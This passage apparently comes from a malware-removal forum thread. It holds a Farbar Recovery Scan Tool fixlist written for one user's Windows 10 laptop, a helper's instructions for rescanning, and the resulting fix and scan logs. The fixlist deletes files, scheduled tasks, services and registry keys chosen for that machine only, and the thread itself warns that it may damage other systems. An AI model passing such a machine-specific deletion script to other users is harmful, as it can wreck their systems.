C:\Users\RoNiN\realplay.exe 
C:\Users\RoNiN\realshare.exe 
C:\Users\RoNiN\realtrimmer.exe 
C:\Users\RoNiN\rjbres.dll 
C:\Users\RoNiN\rjdlg.dll 
C:\Users\RoNiN\rjprog.dll 
C:\Users\RoNiN\rjwmapln.dll 
C:\Users\RoNiN\rndevicedbbuilder.exe 
C:\Users\RoNiN\rpau3260.dll 
C:\Users\RoNiN\rphelperapp.exe 
C:\Users\RoNiN\rpplugprot.dll 
C:\Users\RoNiN\rpshell.dll 
C:\Users\RoNiN\rpshellextension.dll 
C:\Users\RoNiN\rpshellsearch.dll 
C:\Users\RoNiN\rpwa3260.dll 
C:\Users\RoNiN\strs23.dat 
C:\Users\RoNiN\strs26.dat 
C:\Users\RoNiN\tnetdtct.dll 
C:\Users\RoNiN\tpasdk.dll 
C:\Users\RoNiN\tsasdk.dll 
C:\Users\RoNiN\wmdmhelper.dll
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe 
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe 
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe 
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe 
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe 
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe 
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe 
C:\Users\RoNiN\AppData\Local\Temp\io1.exe 
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe 
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe 
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll 
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe 
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll 
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll 
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION 
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION 
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION 
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION 
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION 
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION 
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION 
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION 
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION 
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION 
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION 
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION 
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION 
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION 
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION 
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
EmptyTemp:
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system

Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.


***


FRST / FSRT64: run it again.
  • Right-click FRST / FSRT64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Put a check into the box next to Addition.txt and
    press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

***


Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
With some infections, you may see two messages boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.

#9 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 14 April 2016 - 08:10 PM

Hi Jo!  Thanks for your help.  I have placed all the logs below.  When I ran the mbar scan it came back that no malware was found :)

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-13 20:21:03) Run:4
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
U3 idsvc; no ImagePath 
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] 
U3 wpcsvc; no ImagePath
C:\ProgramData\WceNM3o.dat 
C:\Users\RoNiN\autoplaylist.dat 
C:\Users\RoNiN\cddbcontrol.dll 
C:\Users\RoNiN\cddblink.dll 
C:\Users\RoNiN\cddbmusicid.dll 
C:\Users\RoNiN\convert.exe 
C:\Users\RoNiN\dbghelp.dll 
C:\Users\RoNiN\dunzip32.dll 
C:\Users\RoNiN\fixrjb.exe 
C:\Users\RoNiN\hxaudiodevicehook.dll 
C:\Users\RoNiN\ierjplug.dll 
C:\Users\RoNiN\keys.dat 
C:\Users\RoNiN\mc_enc_h263.dll 
C:\Users\RoNiN\mediainfo.dll 
C:\Users\RoNiN\mmcdda32.dll 
C:\Users\RoNiN\rdsf3260.dll 
C:\Users\RoNiN\realcleaner.exe 
C:\Users\RoNiN\realconverter.exe 
C:\Users\RoNiN\realjbox.exe 
C:\Users\RoNiN\realplay.exe 
C:\Users\RoNiN\realshare.exe 
C:\Users\RoNiN\realtrimmer.exe 
C:\Users\RoNiN\rjbres.dll 
C:\Users\RoNiN\rjdlg.dll 
C:\Users\RoNiN\rjprog.dll 
C:\Users\RoNiN\rjwmapln.dll 
C:\Users\RoNiN\rndevicedbbuilder.exe 
C:\Users\RoNiN\rpau3260.dll 
C:\Users\RoNiN\rphelperapp.exe 
C:\Users\RoNiN\rpplugprot.dll 
C:\Users\RoNiN\rpshell.dll 
C:\Users\RoNiN\rpshellextension.dll 
C:\Users\RoNiN\rpshellsearch.dll 
C:\Users\RoNiN\rpwa3260.dll 
C:\Users\RoNiN\strs23.dat 
C:\Users\RoNiN\strs26.dat 
C:\Users\RoNiN\tnetdtct.dll 
C:\Users\RoNiN\tpasdk.dll 
C:\Users\RoNiN\tsasdk.dll 
C:\Users\RoNiN\wmdmhelper.dll
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe 
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe 
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe 
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe 
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe 
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe 
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe 
C:\Users\RoNiN\AppData\Local\Temp\io1.exe 
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe 
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe 
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll 
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe 
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll 
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll 
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION 
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION 
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION 
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION 
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION 
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION 
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION 
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION 
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION 
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION 
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION 
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION 
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION 
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION 
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION 
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
EmptyTemp:
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\WINDOWS\SysWOW64\GroupPolicy\User => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\OldSearch" => key removed successfully
HKCR\CLSID\OldSearch => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0F462454-2A7D-48CE-B2B5-ECD4B55B6026}" => key removed successfully
HKCR\CLSID\{0F462454-2A7D-48CE-B2B5-ECD4B55B6026} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C9D867C8-1E65-4F71-970A-C677CAECFCC3}" => key removed successfully
HKCR\CLSID\{C9D867C8-1E65-4F71-970A-C677CAECFCC3} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB}" => key removed successfully
HKCR\CLSID\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} => key not found. 
idsvc => service removed successfully
wfpcapture => service removed successfully
wpcsvc => service removed successfully
C:\ProgramData\WceNM3o.dat => moved successfully
C:\Users\RoNiN\autoplaylist.dat => moved successfully
C:\Users\RoNiN\cddbcontrol.dll => moved successfully
C:\Users\RoNiN\cddblink.dll => moved successfully
C:\Users\RoNiN\cddbmusicid.dll => moved successfully
C:\Users\RoNiN\convert.exe => moved successfully
C:\Users\RoNiN\dbghelp.dll => moved successfully
C:\Users\RoNiN\dunzip32.dll => moved successfully
C:\Users\RoNiN\fixrjb.exe => moved successfully
C:\Users\RoNiN\hxaudiodevicehook.dll => moved successfully
C:\Users\RoNiN\ierjplug.dll => moved successfully
C:\Users\RoNiN\keys.dat => moved successfully
C:\Users\RoNiN\mc_enc_h263.dll => moved successfully
C:\Users\RoNiN\mediainfo.dll => moved successfully
C:\Users\RoNiN\mmcdda32.dll => moved successfully
C:\Users\RoNiN\rdsf3260.dll => moved successfully
C:\Users\RoNiN\realcleaner.exe => moved successfully
C:\Users\RoNiN\realconverter.exe => moved successfully
C:\Users\RoNiN\realjbox.exe => moved successfully
C:\Users\RoNiN\realplay.exe => moved successfully
C:\Users\RoNiN\realshare.exe => moved successfully
C:\Users\RoNiN\realtrimmer.exe => moved successfully
C:\Users\RoNiN\rjbres.dll => moved successfully
C:\Users\RoNiN\rjdlg.dll => moved successfully
C:\Users\RoNiN\rjprog.dll => moved successfully
C:\Users\RoNiN\rjwmapln.dll => moved successfully
C:\Users\RoNiN\rndevicedbbuilder.exe => moved successfully
C:\Users\RoNiN\rpau3260.dll => moved successfully
C:\Users\RoNiN\rphelperapp.exe => moved successfully
C:\Users\RoNiN\rpplugprot.dll => moved successfully
C:\Users\RoNiN\rpshell.dll => moved successfully
C:\Users\RoNiN\rpshellextension.dll => moved successfully
C:\Users\RoNiN\rpshellsearch.dll => moved successfully
C:\Users\RoNiN\rpwa3260.dll => moved successfully
C:\Users\RoNiN\strs23.dat => moved successfully
C:\Users\RoNiN\strs26.dat => moved successfully
C:\Users\RoNiN\tnetdtct.dll => moved successfully
C:\Users\RoNiN\tpasdk.dll => moved successfully
C:\Users\RoNiN\tsasdk.dll => moved successfully
C:\Users\RoNiN\wmdmhelper.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\io1.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{102A620C-F30C-4549-9641-182161BCECEB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{102A620C-F30C-4549-9641-182161BCECEB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1BAAE6FE-C34D-4631-9BB2-16D444231725}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BAAE6FE-C34D-4631-9BB2-16D444231725}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{323B5AD8-0CF3-498F-B85C-6889DE79CF89}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{323B5AD8-0CF3-498F-B85C-6889DE79CF89}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{431A8418-553F-414C-B938-84B7D6C11432}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{431A8418-553F-414C-B938-84B7D6C11432}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{564B49C2-B6F5-4F1E-97F5-C10111DA8EE4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{564B49C2-B6F5-4F1E-97F5-C10111DA8EE4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{99331EF5-343D-47FD-B006-40F37A0D5E9D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5AF597F4-43A4-4292-9389-1D19188D828F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5AF597F4-43A4-4292-9389-1D19188D828F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5B6A393D-57E5-4198-BD7E-00E0B9EF3F77}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B6A393D-57E5-4198-BD7E-00E0B9EF3F77}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5BD1D165-089F-40BA-8D52-B90C85B1BB0D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BD1D165-089F-40BA-8D52-B90C85B1BB0D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6D890055-866E-4872-979D-B8AB3884F1DC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D890055-866E-4872-979D-B8AB3884F1DC}" => key removed successfully
C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WMMAWVKOLXONAOYC" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{874B492C-C094-4938-A93E-0F5141822989}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{874B492C-C094-4938-A93E-0F5141822989}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BE0F7D0B-3323-406F-AAEF-1A12388A1C9C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE0F7D0B-3323-406F-AAEF-1A12388A1C9C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D3ACB7DB-7815-42A9-A39F-8D89E1EDF573}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D3ACB7DB-7815-42A9-A39F-8D89E1EDF573}" => key removed successfully
C:\WINDOWS\System32\Tasks\Pritc => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pritc" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D92D97F2-2EDF-4800-82E5-E726F16D0395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D92D97F2-2EDF-4800-82E5-E726F16D0395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E86953B2-7A47-4920-B975-308AAEEA66E9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E86953B2-7A47-4920-B975-308AAEEA66E9}" => key removed successfully
C:\WINDOWS\System32\Tasks\BJZJKCUBLH1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BJZJKCUBLH1" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LuckyTab => key not found. 
C:\WINDOWS\Tasks\BJZJKCUBLH1.job => moved successfully
C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => moved successfully
"C:\ProgramData\Service1291" => not found.
EmptyTemp: => 2.3 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 20:28:55 ====
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-14 18:41:54)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
